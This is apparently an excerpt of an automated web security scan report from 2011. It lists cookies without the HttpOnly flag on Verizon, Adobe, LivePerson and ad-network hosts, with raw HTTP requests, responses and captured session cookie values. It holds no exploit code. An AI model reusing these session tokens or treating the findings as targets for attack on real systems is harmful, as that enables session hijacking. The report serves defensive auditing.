http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/interactivemaps-min.js
http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.autocomplete.js
http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/jquery.fancybox-1.3.4.pack_blkbg.js
http://www22.verizon.com/onecms/vzcareers/ak-cached/4h/includes/javascript/resizeFlashContent.js
http://www22.verizon.com/onecms/vzcareers/includes/javascript/oo_engine.js
http://www22.verizon.com/residentialhelp/fiostv
http://www22.verizon.com/residentialhelp/inhomeagent
http://www22.verizon.com/residentialhelp/inhomeagent/
http://www22.verizon.com/residentialhelp/phone
https://www22.verizon.com/FORYOURHOME/GOFLOW/employeeflow/EmpDiscountProgram.aspx
https://www22.verizon.com/FORYOURSMALLBIZ/GOFLOW/NATIONALBUNDLES/NBUNDLEQUALIFY.ASPX
https://www22.verizon.com/ForYourHome/GoFlow/MyVerizonNew/ACSLogin.aspx
https://www22.verizon.com/ForYourHome/Goflow/MyVerizon/OneClick/MyVerizonAsync.aspx
https://www22.verizon.com/ForYourHome/VZRepair/vziha/Service.aspx
https://www22.verizon.com/ForYourSmallBiz/GoFlow/NationalBundles/BundleQualify.aspx
https://www22.verizon.com/content/VerizonGlobalHome/validlogin.aspx
https://www22.verizon.com/includes/cache/15/blank.html
https://www22.verizon.com/includes/cache/getwb31.asp
https://www22.verizon.com/includes/javascript/commonjs/
https://www22.verizon.com/includes/javascript/hbx.js/
https://www22.verizon.com/includes/javascript/hbx_custom.js/
https://www22.verizon.com/includes/javascript/sitewise.js/
https://www22.verizon.com/vztracker/vzTracker.aspx
http://www35.vzw.com/HG
http://www35.vzw.com/HGct

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.

10.1. http://business.verizon.net/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://business.verizon.net
Path:	/SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; path=/
AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; expires=Sat, 08-Sep-2018 22:35:47 GMT; path=/; domain=verizon.net
AkaSTrackingID=F03373E721508DB1B1034D461D039B58; path=/; domain=verizon.net

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /SMBPortalWeb/appmanager/SMBPortal707d3(a)c76e008a5a1/smb HTTP/1.1
Host: business.verizon.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5
Content-Length: 81
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Type: text/html; charset=UTF-8
Expires: Mon, 05 Sep 2011 22:35:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 05 Sep 2011 22:35:47 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SaasSessionID=6HwvTlTDDDqxbJHQylhDzp1qy40cPyFnn5JkYgDhB2FQrR0Dm7d2!1058537351; path=/
Set-Cookie: AkaUTrackingID=CCA5CE7F785A7866A11942A8BCDFE833; expires=Sat, 08-Sep-2018 22:35:47 GMT; path=/; domain=verizon.net
Set-Cookie: AkaSTrackingID=F03373E721508DB1B1034D461D039B58; path=/; domain=verizon.net

Resource /SMBPortal707d3(a)c76e008a5a1/smb could not be resolved for locale null.

10.2. http://community.adobe.com/help/rm/sugg.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://community.adobe.com
Path:	/help/rm/sugg.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONID=EA8C3A95144AB975FDABE9CB1FAE425B; Path=/help
ach-locale=en_US; Domain=adobe.com; Expires=Wed, 05-Oct-2011 22:34:46 GMT; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /help/rm/sugg.html HTTP/1.1
Host: community.adobe.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:34:46 GMT
Set-Cookie: ach-locale=en_US; Domain=adobe.com; Expires=Wed, 05-Oct-2011 22:34:46 GMT; Path=/
Set-Cookie: JSESSIONID=EA8C3A95144AB975FDABE9CB1FAE425B; Path=/help
Pragma: public
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Mon, 05 Sep 2011 22:34:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: pre-check=0, post-check=0, max-age=0
Pragma: no-cache
Expires: 0
Content-Type: text/xml;charset=UTF-8
Content-Length: 204
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="utf-8"?>

<ion ver="1.0"><hl>en_US</hl><error severity="error" errorCode="MISSING_ARGUMENT" method="ach.search.sugg">One of required parameters is missing q</error></io
...[SNIP]...

10.3. https://login.verizonwireless.com/amserver/saml2/jsp/idpSSOInit.jsp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://login.verizonwireless.com
Path:	/amserver/saml2/jsp/idpSSOInit.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

JSESSIONID=89A59939130D388D7849198CE10F65BE; Path=/amserver

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /amserver/saml2/jsp/idpSSOInit.jsp HTTP/1.1
Host: login.verizonwireless.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.4. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDQCBDACQS=GFHBJLKAIMBKKNPIJLELBFCD; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=2329305&d_id=undefined HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; HumanClickACTIVE=1315261001562

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:16:46 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2123
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDQCBDACQS=GFHBJLKAIMBKKNPIJLELBFCD; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 2329305
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hon
...[SNIP]...

10.5. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDSCCAASQT=PGKOLLOAKCMLGBBEGDEEFLGE; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp?site=2329305&d_id=undefined HTTP/1.1
Host: sales.liveperson.net
Proxy-Connection: keep-alive
Referer: http://www.verizonbusiness.com/Medium/sign-in/vec/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: LivePersonID=LP i=5110247826455,d=1314795678; ASPSESSIONIDQSBSDQDT=AHDPIJCABMFOAADKOLJOBFBJ; HumanClickACTIVE=1315261045786
If-Modified-Since: Tue, 14 Jul 2009 13:04:47 GMT

Response

HTTP/1.1 200 OK
Date: Mon, 05 Sep 2011 22:17:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Last-Modified: Tue, 14 Jul 2009 13:04:47 GMT
Content-Length: 2123
Content-Type: application/x-javascript
Set-Cookie: ASPSESSIONIDSCCAASQT=PGKOLLOAKCMLGBBEGDEEFLGE; path=/
Cache-control: public, max-age=3600, s-maxage=3600

//Plugins for site 2329305
lpAddMonitorTag();
typeof lpMTagConfig!="undefined"&&function(a){lpMTagConfig.isMobile=!1;if(/android|avantgo|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hon
...[SNIP]...

10.6. http://sales.liveperson.net/visitor/addons/deploy.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://sales.liveperson.net
Path:	/visitor/addons/deploy.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDCQQTCTSA=HLKAPFHCLMLFMHDAOAJLLEPA; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /visitor/addons/deploy.asp HTTP/1.1
Host: sales.liveperson.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Connection: close
Date: Mon, 05 Sep 2011 22:35:37 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 424
Content-Type: text/html
Set-Cookie: ASPSESSIONIDCQQTCTSA=HLKAPFHCLMLFMHDAOAJLLEPA; path=/
Cache-control: private

//Plugins for site
<font face="Arial" size=2>
<p>Server.MapPath()</font> <font face="Arial" size=2>error 'ASP 0174 : 80004005'</font>
<p>
<font face="Arial" size=2>Invalid Path Character(s)</font>

...[SNIP]...

10.7. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://secure.opinionlab.com
Path:	/ccc01/comment_card_json_4_0_b.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

ASPSESSIONIDAAAQCDSR=CBJOPHDCDACKEPKDCCMHHGPC; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ccc01/comment_card_json_4_0_b.asp HTTP/1.1
Host: secure.opinionlab.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.8. http://www.verizonwireless.com/b2c/index.html previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.verizonwireless.com
Path:	/b2c/index.html

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; path=/
GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; domain=.verizonwireless.com; expires=Tuesday, 04-Sep-2012 22:15:38 GMT; path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /b2c/index.html HTTP/1.1
Host: www.verizonwireless.com
Proxy-Connection: keep-alive
Referer: http://www22.verizon.com/content/verizonglobalhome/ghp_landing.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Date: Mon, 05 Sep 2011 22:15:38 GMT
Pragma: no-cache
Content-Type: text/html; charset=ISO-8859-1
Expires: Sun, 17 Sept 2000 12:00:00 GMT
Set-Cookie: GLOBALID=JHPrv0rWj7yocbPko%2BHLF8zqOnD3%2FSV22d7pwWM5O%2FNFRQcl%2By5AJJhaVp3nPNUb; domain=.verizonwireless.com; expires=Tuesday, 04-Sep-2012 22:15:38 GMT; path=/
Set-Cookie: JSESSIONIDB2C=jZvNTlKK9hnVQLQqjRF12BK92hhyybvqCRTpT2bzvwXHMhjVwyJn!1237649322!elton!5102!-1; path=/
Content-Language: en-US
X-Powered-By: Servlet/2.5 JSP/2.1
Set-Cookie: NSC_xxx_xmt_c2d_mcwt=ffffffff09f6572d45525d5f4f58455e445a4a4225de;path=/;httponly
Set-Cookie: NSC_xxx_hwt=ffffffff8ab44cd945525d5f4f58455e445a4a420000;path=/;httponly
Content-Length: 32484

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" lang="en-us" xml:lang="
...[SNIP]...

10.9. http://www22.verizon.com/content/verizonglobalhome/gpromo.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www22.verizon.com
Path:	/content/verizonglobalhome/gpromo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; expires=Sun, 04-Dec-2011 23:37:10 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/verizonglobalhome/gpromo.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Content-Type: text/html; charset=utf-8
Content-Length: 16461
Expires: Mon, 05 Sep 2011 22:37:10 GMT
Cache-Control: max-age=0, no-cache, no-store
Date: Mon, 05 Sep 2011 22:37:10 GMT
Connection: close
Set-Cookie: GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; expires=Sun, 04-Dec-2011 23:37:10 GMT; path=/
Set-Cookie: HBXInitialVisit=Y; domain=.verizon.com; path=/


<div class="marquee_selector_bubble sprite sprite_marquee_bubble"></div>
                        <table class="marquee_selectors"><tr><td>

                        <UL><LI><A class="marquee_selector
...[SNIP]...

10.10. https://www22.verizon.com/content/verizonglobalhome/gpromo.aspx previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	https://www22.verizon.com
Path:	/content/verizonglobalhome/gpromo.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; expires=Sun, 04-Dec-2011 23:37:54 GMT; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /content/verizonglobalhome/gpromo.aspx HTTP/1.1
Host: www22.verizon.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

10.11. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/409.178.tk.88x31/0.10282370378263295 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/409.178.tk.88x31/0.10282370378263295

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

i_1=40:409:178:0:0:50961:1315262572:B2; expires=Thu, 06-Oct-2011 22:42:52 GMT; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/409.178.tk.88x31/0.10282370378263295 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=OPT_OUT; ub=OPT_OUT

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 05 Sep 2011 22:43:03 GMT
Content-Type: image/gif
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: i_1=40:409:178:0:0:50961:1315262572:B2; expires=Thu, 06-Oct-2011 22:42:52 GMT; path=/
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 42

GIF89a.............!.......,...........L.;

10.12. http://ad.yieldmanager.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.yieldmanager.com
Path:	/pixel

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

bh="b!!!#r!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!+^.!!!!#=3Elr!!-?2!!!!-=38n'!!-C,!!!!#=3BC@!!-O3!!!!*=38n'!!.uv!!!!#=3Elr!!/pp!!!!#=3Elr!!1CB!!!!$=3_$E!!1SP!!!!#=38n,!!3O?!!!!#=3BC@!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!g]C!!!!#=3Elr!!itb!!!!'=3]pn!!nAq!!!!#=3Elr!!pf4!!!!#=3BC@!!tP)!!!!#=3]pn!!tV-!!!!#=3]pn!!v'l!!!!#=3Elr!!vRm!!!!#=3]pn!!vRq!!!!%=3]pn!!vRr!!!!%=3]pn!!vRv!!!!#=3]pn!!vRw!!!!'=3]pn!!vRx!!!!%=3]pn!!vRy!!!!%=3]pn!!va'!!!!#=3Elr!!y!r!!!!#=3]pn!!y!v!!!!#=3]pn!#!,g!!!!'=3]pn!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0Kr!!!!$=3M3E!#0L2!!!!%=1Cp-!#0fU!!!!$=3]pn!#0fW!!!!$=3]pn!#2A_!!!!#=3]pn!#2Ad!!!!#=3]pn!#2Gj!!!!#=3BC@!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#2XY!!!!#=3]pn!#44f!!!!%=3]pn!#44h!!!!%=3]pn!#5nZ!!!!#=3]pn!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#C,X!!!!#=3Elr!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!%=3]pn!#MTH!!!!%=3]pn!#MTI!!!!%=3]pn!#MTJ!!!!%=3]pn!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#ROs!!!!#=3Elr!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#TnE!!!!#=3]pn!#U5q!!!!#=09!!!#UDP!!!!%=3]pn!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!%=3]pn!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#dCX!!!!%=3Stu!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!(=3H<?!#g<y!!!!%=38n'!#nb^!!!!#=3M3D!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tM)!!!!#=3]pn!#tn2!!!!%=3]pn!#trp!!!!-=38n'!#uQD!!!!$=3_$E!#uQG!!!!$=3_$E!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!%=3]pn!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!%=3]pn!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!$=3H<B!$#R7!!!!#=3]pn!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$(Gt!!!!#=3]pn!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$+M>!!!!#=3M3D!$,0h!!!!$=2Z2#!$,5d!!!!#=3Elr!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$-(b!!!!#=3]pn!$0Ge!!!!$=3M3H!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!'=3H<B!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=X=!!!!#=3H<6!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?=*!!!!#=3Elr!$?i5!!!!#=3BC@!$?tC!!!!#=38n'"; path=/; expires=Wed, 04-Sep-2013 22:14:38 GMT
BX=8d7n6ot73ufk2&b=4&s=8m&t=219; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /pixel?id=1195985&id=1195982&id=103815&t=2 HTTP/1.1
Host: ad.yieldmanager.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://d1qpxk1wfeh8v1.cloudfront.net/tags/1234568496.html
Cookie: bh="b!!!#o!!!?H!!!!$=1j[w!!*l]!!!!#=.lv=!!+^.!!!!#=3Elr!!-?2!!!!-=38n'!!-C,!!!!#=3BC@!!-O3!!!!*=38n'!!.uv!!!!#=3Elr!!/pp!!!!#=3Elr!!1SP!!!!#=38n,!!3O?!!!!#=3BC@!!UHs!!!!#=0>(p!!X41!!!!#=0>(p!!Zwa!!!!-=38n'!!g]C!!!!#=3Elr!!itb!!!!'=3]pn!!nAq!!!!#=3Elr!!pf4!!!!#=3BC@!!tP)!!!!#=3]pn!!tV-!!!!#=3]pn!!v'l!!!!#=3Elr!!vRm!!!!#=3]pn!!vRq!!!!%=3]pn!!vRr!!!!%=3]pn!!vRv!!!!#=3]pn!!vRw!!!!'=3]pn!!vRx!!!!%=3]pn!!vRy!!!!%=3]pn!!va'!!!!#=3Elr!!y!r!!!!#=3]pn!!y!v!!!!#=3]pn!#!,g!!!!'=3]pn!#!y?!!!!#=.lv=!#%v(!!!!#=2w#K!#.dO!!!!$=2Z2#!#.g1!!!!#=.e%I!#.mL!!!!$=0bvK!#/t]!!!!$=09of!#0Kr!!!!$=3M3E!#0L2!!!!%=1Cp-!#0fU!!!!$=3]pn!#0fW!!!!$=3]pn!#2A_!!!!#=3]pn!#2Ad!!!!#=3]pn!#2Gj!!!!#=3BC@!#2Oe!!!!#=1j[w!#2Of!!!!#=1j[w!#2XY!!!!#=3]pn!#44f!!!!%=3]pn!#44h!!!!%=3]pn!#5nZ!!!!#=3]pn!#7(x!!!!'=38n'!#7)a!!!!%=38n'!#?dj!!!!#=/(P2!#?dk!!!!#=/(P2!#C,X!!!!#=3Elr!#M7R!!!!#=09!!!#M7S!!!!#=1>Dd!#MTC!!!!%=3]pn!#MTH!!!!%=3]pn!#MTI!!!!%=3]pn!#MTJ!!!!%=3]pn!#N[7!!!!#=2w#K!#N[8!!!!#=09!!!#Ps:!!!!#=2[IV!#Q*T!!!!$=2Z2#!#Q,i!!!!#=2Z2#!#ROs!!!!#=3Elr!#SCj!!!!$=2Z2#!#SCk!!!!$=2Z2#!#Sw^!!!!#=/(P2!#TnE!!!!#=3]pn!#U5q!!!!#=09!!!#UDP!!!!%=3]pn!#YCf!!!!#=2w#K!#Ym:!!!!#=1,!r!#Ym>!!!!#=1,!r!#Z8E!!!!*=38n'!#Zgs!!!!%=38n'!#ZhT!!!!'=38n'!#[R[!!!!%=3]pn!#aG>!!!!$=2Z2#!#aP0!!!!'=/<(G!#bGa!!!!#=09!!!#bGi!!!!#=09!!!#bw^!!!!*=38n'!#dCX!!!!%=3Stu!#fBj!!!!*=38n'!#fBk!!!!*=38n'!#fBm!!!!*=38n'!#fBn!!!!*=38n'!#fG+!!!!%=38n'!#fvy!!!!(=3H<?!#g<y!!!!%=38n'!#nb^!!!!#=3M3D!#t>.!!!!#=1,!r!#tLr!!!!#=1+1N!#tM)!!!!#=3]pn!#tn2!!!!%=3]pn!#trp!!!!-=38n'!#ust!!!!$=2Z2#!#usu!!!!$=2Z2#!#uw*!!!!%=3]pn!#v,W!!!!#=09!!!#v,Y!!!!#=1>Dd!#v-$!!!!#=09!!!#wW9!!!!$=2Z2#!#x?H!!!!-=38n'!#xUN!!!!%=3]pn!#yM#!!!!$=2Z2#!$#4B!!!!$=38n'!$#9a!!!!#=1D5B!$#?.!!!!$=3H<B!$#R7!!!!#=3]pn!$#WA!!!!$=2Z2#!$$F#!!!!#=/bCH!$%'+!!!!$=/>v>!$%,!!!!!$=2Z2#!$%SB!!!!$=2Z2#!$'/Y!!!!#=09!!!$(!(!!!!-=38n'!$(!P!!!!*=38n'!$(Gt!!!!#=3]pn!$)gA!!!!#=09!!!$*a0!!!!$=2Z2#!$+M>!!!!#=3M3D!$,0h!!!!$=2Z2#!$,5d!!!!#=3Elr!$,jw!!!!#=2w#K!$-%:!!!!$=38n'!$-(b!!!!#=3]pn!$0Ge!!!!$=3M3H!$0VL!!!!%=38n'!$0VM!!!!%=38n'!$1]+!!!!+=38n'!$1g/!!!!%=1D5F!$2j$!!!!$=2Z2#!$3IO!!!!*=38n'!$3y-!!!!(=2w%w!$4ou!!!!$=2Z2#!$5)A!!!!#=09!!!$5Rt!!!!#=1>Dd!$5Ru!!!!#=2w#K!$8+W!!!!%=38n'!$8>S!!!!'=3H<B!$8Js!!!!#=/(P2!$8Ju!!!!#=/(P2!$:3.!!!!#=2w#K!$<DI!!!!*=38n'!$=Gi!!!!#=0_Lo!$=X=!!!!#=3H<6!$=p7!!!!#=2Z2#!$=p8!!!!#=2Z2#!$=s9!!!!#=3+WO!$>#M!!!!#=2Z2#!$>#N!!!!#=2Z2#!$>_#!!!!#=2Z2#!$?=*!!!!#=3Elr!$?i5!!!!#=3BC@!$?tC!!!!#=38n'"; 